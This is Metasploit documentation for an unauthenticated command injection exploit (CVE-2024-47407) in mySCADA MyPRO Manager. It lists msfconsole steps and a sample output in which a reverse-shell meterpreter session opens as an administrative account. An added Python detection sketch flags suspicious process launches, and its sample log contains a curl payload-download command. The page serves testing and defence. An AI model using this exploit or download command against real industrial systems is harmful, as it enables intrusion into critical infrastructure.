documentation/modules/exploit/windows/scada/mypro_mgr_cmd.md
Vulnerability Description
This module exploits a command injection vulnerability in mySCADA MyPRO Manager <= v1.2 (CVE-2024-47407).
An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which are executed in the context of
myscada9, an administrative user that the product adds automatically during installation.
Versions <= 1.2 are affected. CISA published ICSA-24-326-07 to cover the security issues. The official changelog from the vendor for the updated version is available here.
Vulnerable Application Installation
A trial version of the software can be obtained from the vendor.
Successfully tested on
Start msfconsole and run the following commands:
msf > use exploit/windows/scada/mypro_mgr_cmd
msf exploit(windows/scada/mypro_mgr_cmd) > set RHOSTS <IP>
msf exploit(windows/scada/mypro_mgr_cmd) > exploit
You should get a meterpreter session in the context of myscada9.
Running the exploit against MyPRO Manager v1.2 on Windows 11, using curl as a fetch command, should result in an output similar to the following:
msf exploit(windows/scada/mypro_mgr_cmd) > exploit
[*] Started reverse TCP handler on 192.168.1.227:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (201798 bytes) to 192.168.1.228
[*] Meterpreter session 1 opened (192.168.1.227:4444 -> 192.168.1.228:50472) at 2025-01-29 12:38:39 -0500
[*] Exploit finished, check thy shell.
meterpreter > getuid
Server username: asdf\myscada9
meterpreter > sysinfo
Computer : asdf
OS : Windows 11 (10.0 Build 22621).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x64/windows
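A detection-side sketch for the behaviour described above, added here and not part of the Metasploit module or the vendor's software: because injected commands run as myscada9, process-creation records in which that account starts a shell or download tool deserve review. The event records, their field names, the example paths and the list of flagged binaries are constructed assumptions.

```python
import ntpath

# Account the page says MyPRO Manager creates at install time (administrative).
SERVICE_ACCOUNT = "myscada9"
# Assumption: binaries worth flagging when this account launches them. curl is the
# fetch command used on the page; the others are common Windows shells/downloaders.
SUSPECT_IMAGES = {"cmd.exe", "powershell.exe", "curl.exe", "certutil.exe", "tftp.exe"}

# Constructed process-creation records (Security 4688 / Sysmon 1 style fields).
SAMPLE_EVENTS = [
    {"time": "2025-01-29T12:30:02", "user": r"asdf\myscada9",
     "image": r"C:\Program Files\Example\service.exe", "cmdline": "service.exe"},
    {"time": "2025-01-29T12:38:37", "user": r"asdf\myscada9",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl -so C:\Users\Public\a.exe http://192.0.2.10/a"},
    {"time": "2025-01-29T12:38:38", "user": r"ASDF\MYSCADA9",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl -so C:\Users\Public\a.exe http://192.0.2.10/a"},
    {"time": "2025-01-29T12:40:11", "user": r"asdf\operator",
     "image": r"C:\Windows\System32\curl.exe", "cmdline": "curl https://example.com"},
]


def account_name(user):
    """Strip the DOMAIN\\ or HOST\\ prefix and normalise case."""
    return user.rsplit("\\", 1)[-1].lower()


def suspicious_events(events):
    """Return events where the product's account starts a shell or download tool."""
    hits = []
    for ev in events:
        if account_name(ev["user"]) != SERVICE_ACCOUNT:
            continue  # other accounts are out of scope for this check
        if ntpath.basename(ev["image"]).lower() in SUSPECT_IMAGES:
            hits.append(ev)
    return hits


if __name__ == "__main__":
    for ev in suspicious_events(SAMPLE_EVENTS):
        print(f'{ev["time"]} {ev["user"]} -> {ev["cmdline"]}')
```

In practice the records would come from Security event 4688 (with command-line auditing enabled) or Sysmon event 1, mapped to these fields.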